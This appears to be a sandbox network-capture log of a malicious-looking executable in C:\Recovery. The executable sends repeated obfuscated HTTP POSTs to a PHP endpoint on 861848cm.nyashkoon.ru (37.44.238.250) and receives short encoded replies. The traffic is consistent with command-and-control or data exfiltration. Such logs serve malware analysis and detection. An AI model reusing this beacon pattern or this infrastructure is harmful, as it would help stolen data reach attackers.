                                                                    Nov 6, 2024 03:37:23.125720024 CET1252OUTData Raw: 56 52 5a 58 56 5e 50 58 5a 5f 52 51 54 53 5b 53 55 57 59 5e 51 57 52 5a 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VRZXV^PXZ_RQTS[SUWY^QWRZQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%^8=?$]> <[>:=Y*=%'+7 )+=#\,6/ %%'X$.Q-
                                                                    Nov 6, 2024 03:37:23.592039108 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:23.665405989 CET308INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:21 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 152
                                                                    Connection: keep-alive
                                                                    Data Raw: 00 1e 20 58 3f 03 2d 01 30 05 38 18 29 2e 25 13 3c 09 3b 5f 3b 32 0a 59 2a 1d 23 00 3e 01 3c 55 37 06 33 17 22 0c 3d 5b 20 32 20 07 3f 01 21 5f 05 1d 3a 06 33 07 06 56 3e 22 3a 5c 29 0e 33 1b 32 20 3b 18 3d 28 29 05 34 04 3e 55 26 3d 3d 59 25 0c 2c 08 3f 37 3a 04 2c 3f 2c 0e 25 00 2a 57 09 16 23 09 27 23 09 13 3e 1f 3f 59 24 10 31 5f 25 14 20 0c 2a 05 23 5d 37 24 04 5e 29 20 24 03 35 37 3a 59 27 29 3d 1a 32 10 2b 53 29 22 26 55 22 0d 20 54 01 30 5d 4f
                                                                    Data Ascii: X?-08).%<;_;2Y*#><U73"=[ 2 ?!_:3V>":\)32 ;=()4>U&==Y%,?7:,?,%*W#'#>?Y$1_% *#]7$^) $57:Y')=2+S)"&U" T0]O


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    8192.168.2.44974837.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:37:22.929759979 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:37:23.282084942 CET1012OUTData Raw: 56 51 5a 54 53 5a 55 59 5a 5f 52 51 54 58 5b 5e 55 52 59 59 51 50 52 5d 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VQZTSZUYZ_RQTX[^URYYQPR]QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%]8/R=;?(3Z*:"*-_3^;4?%)-,:&?!$.&9'X$.Q-.
                                                                    Nov 6, 2024 03:37:23.739573956 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:23.809732914 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:21 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    9192.168.2.44974937.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:37:24.428978920 CET273OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Nov 6, 2024 03:37:24.781956911 CET1012OUTData Raw: 56 5f 5f 5f 53 5f 50 53 5a 5f 52 51 54 5e 5b 5b 55 50 59 57 51 52 52 58 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: V___S_PSZ_RQT^[[UPYWQRRXQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%]8?6(0+3;*\1[*.>0;77,&?,.&3!72X1'X$.Q-6
                                                                    Nov 6, 2024 03:37:25.241245031 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:25.316793919 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:23 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    10192.168.2.44975137.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:37:25.439796925 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:37:25.797646046 CET1012OUTData Raw: 56 57 5a 5c 56 5f 50 5f 5a 5f 52 51 54 59 5b 5a 55 55 59 5c 51 54 52 58 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VWZ\V_P_Z_RQTY[ZUUY\QTRXQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^&8?>S?8Y?0 **-^3<X &+-+:?#=')'X$.Q-*
                                                                    Nov 6, 2024 03:37:26.250081062 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:26.324264050 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:24 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    11192.168.2.44975237.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:37:26.484267950 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1008
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:37:26.830780029 CET1008OUTData Raw: 56 53 5a 5c 56 5d 55 58 5a 5f 52 51 54 5a 5b 5d 55 57 59 5e 51 50 52 5c 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VSZ\V]UXZ_RQTZ[]UWY^QPR\QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%^;&R=;8]??*9=Z)!';(Z",1<-3.54'1'X$.Q-
                                                                    Nov 6, 2024 03:37:27.287305117 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:27.364610910 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:25 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    12192.168.2.44975337.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:37:27.486308098 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:37:27.844511032 CET1012OUTData Raw: 56 52 5a 5f 53 5d 55 5d 5a 5f 52 51 54 59 5b 59 55 52 59 59 51 50 52 5f 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VRZ_S]U]Z_RQTY[YURYYQPR_QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^&,/=?(8]+3<]):6)*_%;8X4(79%; Y2'X$.Q-*
                                                                    Nov 6, 2024 03:37:28.298870087 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:28.371457100 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:26 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    13192.168.2.44975437.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:37:28.502032995 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1008
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    14192.168.2.44975537.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:37:28.693620920 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1252
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:37:29.047674894 CET1252OUTData Raw: 56 51 5f 5b 56 56 50 58 5a 5f 52 51 54 53 5b 58 55 50 59 5b 51 5f 52 5e 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VQ_[VVPXZ_RQTS[XUPY[Q_R^QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%^,?!?8$^(;*:!Z)*Z'84^4<2V?>#- \ Q1')'X$.Q-
                                                                    Nov 6, 2024 03:37:29.504090071 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:29.574538946 CET308INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:27 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 152
                                                                    Connection: keep-alive
                                                                    Data Raw: 00 1e 23 07 3c 04 2a 11 26 2b 37 08 3e 10 2d 12 3c 09 2f 5f 38 0b 34 5b 2a 0d 3f 03 3d 38 30 55 20 59 3c 00 22 22 26 04 37 0b 2f 5f 3c 2b 21 5f 05 1d 39 12 30 17 06 50 3e 31 36 5f 3e 51 30 40 31 33 20 41 2a 2b 00 11 20 04 08 53 32 10 0c 00 25 22 2f 53 3c 1d 3d 5c 2e 2f 2c 0c 32 00 2a 57 09 16 20 54 24 23 27 5b 2a 31 23 5a 27 10 39 10 26 2a 06 0f 3e 02 3b 12 37 0a 0b 04 3e 23 02 00 22 0e 3e 58 24 14 0f 1a 32 00 34 0a 2b 08 26 55 22 0d 20 54 01 30 5d 4f
                                                                    Data Ascii: #<*&+7>-</_84[*?=80U Y<""&7/_<+!_90P>16_>Q0@13 A*+ S2%"/S<=\./,2*W T$#'[*1#Z'9&*>;7>#">X$24+&U" T0]O


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    15192.168.2.44975637.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:37:28.861772060 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:37:29.219716072 CET1012OUTData Raw: 56 57 5f 5c 56 5c 50 53 5a 5f 52 51 54 5c 5b 59 55 55 59 58 51 5e 52 5a 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VW_\V\PSZ_RQT\[YUUYXQ^RZQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%^,,-+;4+38Y=)!_)$ #)=0.% Q>\%'X$.Q->
                                                                    Nov 6, 2024 03:37:29.680751085 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:29.754108906 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:27 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    16192.168.2.44975737.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:37:30.071151972 CET273OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Nov 6, 2024 03:37:30.422591925 CET1012OUTData Raw: 56 52 5a 55 56 5d 55 5a 5a 5f 52 51 54 58 5b 59 55 56 59 58 51 5f 52 52 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VRZUV]UZZ_RQTX[YUVYXQ_RRQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%Y8/)+^ ??*:.*=0(,^7?!).,:7%&9'X$.Q-.
                                                                    Nov 6, 2024 03:37:30.884957075 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:30.958198071 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:28 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    17192.168.2.44975837.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:37:31.095452070 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:37:31.453897953 CET1012OUTData Raw: 56 54 5a 5a 56 5e 50 5b 5a 5f 52 51 54 5d 5b 53 55 5d 59 58 51 5f 52 53 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VTZZV^P[Z_RQT][SU]YXQ_RSQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%]8!=+8? \>!X*"[$(/"<-?(95,] :1'X$.Q-
                                                                    Nov 6, 2024 03:37:31.896694899 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:31.966439009 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:29 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    18192.168.2.44975937.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:37:32.411256075 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:37:32.767188072 CET1012OUTData Raw: 53 54 5f 59 56 5d 50 5f 5a 5f 52 51 54 53 5b 5c 55 53 59 56 51 56 52 5a 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: ST_YV]P_Z_RQTS[\USYVQVRZQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%];Y.W(<\<(Z>!*=3_7<-+=79%8#&9'X$.Q-
                                                                    Nov 6, 2024 03:37:33.214185953 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:33.294085026 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:31 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    19192.168.2.44976037.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:37:33.438777924 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:37:33.797657013 CET1012OUTData Raw: 56 57 5a 55 56 5f 50 5f 5a 5f 52 51 54 5f 5b 59 55 52 59 5e 51 54 52 5f 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VWZUV_P_Z_RQT_[YURY^QTR_QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%];6<8X+3(\*&>-*%+# ,%+0,5X .')'X$.Q-2
                                                                    Nov 6, 2024 03:37:34.248665094 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:34.328052998 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:32 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    20192.168.2.44976137.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:37:34.485840082 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    21192.168.2.44976237.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:37:34.607675076 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1276
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:37:34.954549074 CET1276OUTData Raw: 56 52 5a 55 53 5c 50 5c 5a 5f 52 51 54 59 5b 5e 55 53 59 5e 51 54 52 5a 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VRZUS\P\Z_RQTY[^USY^QTRZQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%/?)?#< >:[)>Z$(84"?7.6,#)'9'X$.Q-*
                                                                    Nov 6, 2024 03:37:35.428045034 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:35.498843908 CET308INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:33 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 152
                                                                    Connection: keep-alive
